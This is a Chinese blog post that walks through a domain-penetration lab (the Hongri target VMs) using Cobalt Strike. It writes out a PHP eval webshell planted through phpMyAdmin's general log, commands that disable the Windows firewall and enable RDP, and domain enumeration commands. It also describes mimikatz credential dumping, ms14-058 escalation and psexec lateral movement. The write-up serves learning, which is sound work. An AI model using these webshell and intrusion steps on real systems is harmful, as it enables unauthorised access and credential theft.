cs与简单域渗透

2020-07-03 20:07:00

cs - 域渗透

---

前言

上回遇到了域渗透题，自己没事找了个红日的靶机来学学域渗透的东西。

红日的域渗透靶机，有三台机，配了两个网段：

kali  nat 
win7  vm2,nat
win2008 vm2
win2003 vm2

nat为192.168.248.0/24

vm2为192.168.52.0/24

貌似环境问题，win7的靶机需要清理右下角通知区域图标：

reg delete "HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify" /va /f
taskkill /f /im explorer.exe & start explorer.exe

陆陆续续做了好久，虚拟机也重启了几次，有些ip可能变了，本文仅供参考。

靶机后续域渗透比较简单，只是一个知识的了解。

信息收集

135为win7靶机，探测其服务：

root@zhang:~# nmap -sS 192.168.248.135
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-18 23:32 CST
Nmap scan report for 192.168.248.135
Host is up (0.00059s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:6E:05:E6 (VMware)

80端口看下，是个phpstudy探针：

拿webshell

根据如下：phpstudy探针提权

访问phpmyadmin后台root/root弱口令进入。

在探针处可以得到我们的phpstudy部署路径，到sql语句执行处写入马儿：

select "<?php @eval($_POST['hhhm']) ?>" into outfile 'C:/phpStudy/WWW/hhhm.php';

然而会发现提示不能写入：

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

好久没遇到了，回忆一下phpmyadmin日志写shell：phpmyadmin写shell方式

show global variables like "%genera%";

会得到：

我们要做就就是把第一个改为On,第二个改为我们的shell路径。

set global general_log='on';
SET global general_log_file='C:/phpStudy/WWW/hhhm.php';
select "<?php @eval($_POST['hhhm']) ?>";
set global general_log='off';

执行语句之后就会写入我们的马儿，成功拿到webshell。

弹shell

这边mark一下，关闭防火墙的安全警报以避免在主机弹出提示：

netsh advfirewall set allprofiles state off

拿到webshell之后直接上传个exe，因为没有杀软所以很轻易就把shell弹到了cs上面。

可以看到是一个Administrator权限的shell。

主机信息收集

现在着手收集一下主机的信息，先查看一些基础的信息，我收集了一些常用的命令：

ipconfig /all    查询本机IP段，所在域等
net config Workstation    当前计算机名，全名，用户名，系统版本，工作站域，登陆域
net user    本机用户列表
net localhroup administrators    本机管理员[通常含有域用户]
net user /domain    查询域用户
net user 用户名 /domain    获取指定用户的账户信息
netstat -ano    查看开启的端口
net user /domain b404 pass    修改域内用户密码，需要管理员权限
net group /domain    查询域里面的工作组
route　print     查看路由信息
netstat     查看网络服务
query user  查看最近登录信息
net group 组名 /domain    查询域中的某工作组
net group "domain admins" /domain    查询域管理员列表
net group "domain controllers" /domain    查看域控制器(如果有多台)
net time /domain    判断主域，主域服务器都做时间服务器
net accounts查看密码策略
ipconfig /all    查询本机IP段，所在域等

net view:

C:\phpStudy\WWW> net view
服务器名称            注解
-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1    

ipconfig /all:

并且从中可以看到dns服务器为192.168.52.138。

内网提权与移动

用cs的话方便很多，靶机在cs上线直接拿ms14-058能提权到system权限，net view扫扫能发现有另外两台机器（本机为STU1）：

用mimikatz跑出来STU1的账号密码为：

GOD\Administrator hongrisec@2020

测试远程登录发现失败，扫一下端口会发现3389端口没有开启，使用命令开启：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

这就成功登录上目标机器，接下来考虑一下如何横向移动。

先创建一个SMB Beacon，因为先前抓取凭证的时候很容易就抓到了域管理员账号密码，所以这里直接使用psexec尝试登录，此时会发现又一台机器上线。

同理可以将域内另一台机器上线。

本文原创于HhhM的博客，转载请标明出处。

   _   _ _     _    ___  ___
  | | | | |   | |   |  \/  |
  | |_| | |__ | |__ | .  . |
  |  _  | '_ \| '_ \| |\/| |
  | | | | | | | | | | |  | |
  \_| |_/_| |_|_| |_\_|  |_/